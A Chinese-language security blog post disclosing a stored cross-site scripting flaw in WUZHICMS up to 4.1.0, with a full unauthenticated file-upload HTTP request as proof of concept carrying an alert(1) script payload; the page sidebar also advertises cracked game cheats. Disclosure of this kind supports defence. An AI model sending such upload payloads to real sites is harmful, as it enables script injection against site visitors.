bc/qb源码请联系后购买,如未联系付款后出现无法下载,不负责!
仅为永久钻石会员提供技术支持以及服务,或付费!

WUZHICMS 4.1.0 中存储的跨脚本漏洞

176715

影响:<=4.1.0

ckeditor 是第三方网页编辑器。并且您可以看到它的默认文件扩展名(在文件 `coreframe/app/attachment/libs/class/ckditor.class.php` 中)包含一些扩展名,这些扩展名可以在特定文件时由浏览器(例如 Google Chrome)执行为 html可以在web目录下访问。

图片[1]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

并且这个 cms 允许在没有用户身份验证的情况下上传文件,因此访客可以上传特定文件。

4.0.0

POST /index.php?m=attachment&f=index&v=ckeditor&action=uploadfile&CKEditor=content&CKEditorFuncNum=0&langCode=zh-cn&responseType=json HTTP/1.1

Host: 192.168.1.58

Content-Length: 232

Origin: http://192.168.1.58

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3806.1 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypYLApmLtKBESAKEg

Accept: */*

Referer: http://192.168.1.58/index.php?m=attachment&f=index&v=upload_dialog&callback=callback_ck_images&htmlid=content&limit=10&htmlname=form%5Bthumb%5D&ext=jpg|png|gif&token=c3bc987cbbe8894cf67bfe282f1c002b&_menuid=26

Accept-Encoding: gzip, deflate

Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-HK;q=0.7,zh-CN;q=0.6,zh-TW;q=0.5

Cookie: username=fxxx

Connection: close



------WebKitFormBoundarypYLApmLtKBESAKEg

Content-Disposition: form-data; name="upfile"; filename="xx.md"

Content-Type: application/octet-stream



<html><script>alert(1)</script></html>

------WebKitFormBoundarypYLApmLtKBESAKEg--

图片[2]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

图片[3]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

In 4.1.0

图片[4]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

图片[5]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区
 

你可能喜欢的文章:

  1. wuzhicms v4.1.0 后台存在任何文件删除漏洞
  2. MySQL 漏洞利用与提权
  3. OLive存在任意文件读取漏洞
  4. Wuzhicms v4.1.0 /coreframe/app/order/admin/card.php 存在SQL注入漏洞2
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
版权声明
本站网络名称: 孤勇者社区
本站永久网址: https://www.gyzsq.com
网站侵权说明: 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
安全资讯
# 漏洞# wuzhicms
喜欢就支持一下吧
点赞15赞赏 分享
孤勇者的头像-孤勇者社区钻石会员
超凡先锋PC_TQ单板绘制辅助破解版「2022-5-8 00:42」-孤勇者社区
超凡先锋PC_TQ单板绘制辅助破解版「2022-5-8 00:42」
超凡先锋PC_TQ单板绘制辅助破解版「2022-5-8 00:42」
2年前 3919
PC生死狙击2·单板绘制助手免费版 v6.16「2022-6-16 00:08」-孤勇者社区
PC生死狙击2·单板绘制助手免费版 v6.16「2022-6-16 00:08」
PC生死狙击2·单板绘制助手免费版 v6.16「2022-6-16 00:08」
2年前 3209
2022年萝卜影视APP源码 麻花金色UI最新原生版APP-孤勇者社区
2022年萝卜影视APP源码 麻花金色UI最新原生版APP
2022年萝卜影视APP源码 麻花金色UI最新原生版APP
2年前 3118
Hitomi Downloader v3.7k中文版「2022.5.8」「2022.5.8」-孤勇者社区
Hitomi Downloader v3.7k中文版「2022.5.8」「2022.5.8」
Hitomi Downloader v3.7k中文版「2022.5.8」「2022.5.8」
2年前 3114
CSGO小岛人物发光投视免费版下载「2022-5-7 10:38」-孤勇者社区
CSGO小岛人物发光投视免费版下载「2022-5-7 10:38」
CSGO小岛人物发光投视免费版下载「2022-5-7 10:38」
2年前 3099
【免费资源】 蓝猫视频APP影视追剧软件海量高清的影视资源(免费资源下载网址)-孤勇者社区
【免费资源】 蓝猫视频APP影视追剧软件海量高清的影视资源(免费资源下载网址)
【免费资源】 蓝猫视频APP影视追剧软件海量高清的影视资源(...
2年前 3098
相关推荐
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片
    只看作者
    • 头像卡角0
      管理员发布的这个 WUZHICMS 4.1.0 中存储的跨脚本漏洞喜欢这篇文章,作者666,文章真棒!
      1年前回复
用户封面
孤勇者的头像-孤勇者社区钻石会员
Cloud2.0时代,运营商能把握云之大势吗?(云运营服务)
Java 在 2018 的关键字:Eclipse 之年,容器和无服务器
Purism向linux手机开炮(linux pub)
Oracle延长了对Java 8 免费支持
Google Lens将登陆Android设备
任天堂Switch破解变身Linux平板电脑(任天堂switch破解软件)
超凡先锋PC_TQ单板绘制辅助破解版-孤勇者社区
3919人已阅读
超凡先锋PC_TQ单板绘制辅助破解版「2022-5-8 00:42」
TOP1
PC生死狙击2·单板绘制助手免费版 v6.16-孤勇者社区
PC生死狙击2·单板绘制助手免费版 v6.16「2022-6-16 00:08」
2年前3209人已阅读
TOP2
2022年萝卜影视APP源码 麻花金色UI最新原生版APP-孤勇者社区
2022年萝卜影视APP源码 麻花金色UI最新原生版APP
2年前3118人已阅读
TOP3
Hitomi Downloader v3.7k中文版「2022.5.8」-孤勇者社区
Hitomi Downloader v3.7k中文版「2022.5.8」「2022.5.8」
2年前3114人已阅读
TOP4
CSGO小岛人物发光投视免费版下载-孤勇者社区
CSGO小岛人物发光投视免费版下载「2022-5-7 10:38」
2年前3099人已阅读
TOP5
【免费资源】 蓝猫视频APP影视追剧软件海量高清的影视资源(免费资源下载网址)-孤勇者社区
【免费资源】 蓝猫视频APP影视追剧软件海量高清的影视资源(免费资源下载网址)
2年前3098人已阅读
TOP6
标签云
龙魂龙骑士龙车龙腾虎跃龙璟龙猫龙帝龙小天龙吟龙单龙兵齿轮鼠鼠鼠标鼎鼎默认默安黑鸦黑鸟黑鲸